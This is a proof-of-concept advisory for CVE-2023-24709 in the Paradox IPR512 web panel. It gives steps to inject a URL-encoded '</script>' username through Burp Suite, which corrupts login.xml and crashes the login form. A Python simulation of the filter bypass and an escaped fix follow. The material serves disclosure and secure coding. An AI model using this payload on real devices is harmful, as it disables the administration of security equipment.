# Injection vulnerability in Paradox Security Systems IPR512 - CVE-2023-24709 PoC
On the Paradox Security Systems IPR512 web console login page, an attacker can submit a JavaScript/HTML tag such as <code></script></code> in the login form. The value is written into the configuration file "login.xml", which corrupts it and causes the login form to crash and become unavailable.
!!!WARNING!!! This has a damaging impact on the running service: once the payload is stored, the login form is no longer usable.
<b>1. The Paradox Security Systems IPR512 Account Management web panel is reachable. Enter "admin" as the username.</b>

<b>2. Intercept the login request with Burp Suite.</b>

<b>3. Replace "admin" with the closing JavaScript tag <code></script></code>.</b>

<b>4. URL-encode <code></script></code> (i.e. <code>%3C%2Fscript%3E</code>) to bypass the security filter, then forward the request.</b>

<b>5. If access to login.xml is not restricted, retrieve it and confirm that the stored value has been overwritten with the payload.</b>

<b>6. The web panel login form is no longer reachable: it crashes when it loads the corrupted login.xml.</b>
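The steps above, modelled end to end as an added example (this is not code from the original PoC or from Paradox). The real format of login.xml, the form field names and the behaviour of the device's filter are not documented on this page, so the XML layout, the <code>username=</code>/<code>password=</code> body and the "inspect the raw body before URL decoding" filter below are assumptions chosen to show why the percent-encoded payload gets past a naive blacklist and why an unescaped <code></script></code> breaks the stored XML. The hardened renderer shows the fix a practitioner would want: XML-escape anything written into login.xml.

```python
"""Added illustration of the CVE-2023-24709 PoC flow (not the original PoC code).

Assumptions, none of them taken from the page:
  * the device stores the submitted username in a small XML document
    (stand-in for login.xml; the real layout is unknown),
  * a naive blacklist filter inspects the raw request body *before*
    URL decoding,
  * the web panel parses the stored XML when rendering the login page.
"""
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote
from xml.sax.saxutils import escape

PAYLOAD = "</script>"  # the tag used in the PoC


def naive_filter_blocks(raw_body: str) -> bool:
    """Assumed blacklist: looks for a literal script tag in the raw body."""
    body = raw_body.lower()
    return "<script" in body or "</script" in body


def encode_for_bypass(payload: str) -> str:
    """Step 4 of the PoC: percent-encode every reserved character."""
    return quote(payload, safe="")  # '</script>' -> '%3C%2Fscript%3E'


def render_login_xml_vulnerable(username: str) -> str:
    """Writes the decoded username into the XML without escaping."""
    return f"<login><user>{username}</user></login>"


def render_login_xml_hardened(username: str) -> str:
    """XML-escapes the value so '<' and '>' cannot break the document."""
    return f"<login><user>{escape(username)}</user></login>"


def xml_is_well_formed(doc: str) -> bool:
    """Stands in for the panel loading login.xml; False means 'crashed'."""
    try:
        ET.fromstring(doc)
        return True
    except ET.ParseError:
        return False


def simulate(payload: str, hardened: bool = False) -> dict:
    """Runs one login request through filter -> decode -> store -> render."""
    encoded = encode_for_bypass(payload)
    raw_body = f"username={encoded}&password=x"  # constructed request body
    if naive_filter_blocks(raw_body):
        return {"blocked": True, "well_formed": True}
    stored = unquote(encoded)  # the server decodes only after the filter ran
    render = render_login_xml_hardened if hardened else render_login_xml_vulnerable
    doc = render(stored)
    return {
        "blocked": False,
        "stored": stored,
        "xml": doc,
        "well_formed": xml_is_well_formed(doc),
    }


if __name__ == "__main__":
    # Literal payload is caught by the blacklist...
    print("literal blocked:", naive_filter_blocks(f"username={PAYLOAD}"))
    # ...the percent-encoded one is not, and the stored XML no longer parses.
    print("vulnerable:", simulate(PAYLOAD))
    # With escaping the same input is stored harmlessly.
    print("hardened:  ", simulate(PAYLOAD, hardened=True))
```

Run it with any payload containing <code>&lt;</code> or <code>&gt;</code>: the vulnerable path reports <code>well_formed: False</code> (the simulated login.xml can no longer be parsed, which is the "crash" the PoC describes), while the hardened path keeps the document well-formed because the stored value is escaped rather than filtered.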

Code injection vulnerability in login.html on the web panel login page of the Paradox Security Systems IPR512 allows a remote or local attacker to crash the web panel login page by injecting simple JavaScript code, such as <code></script></code>, into the login form.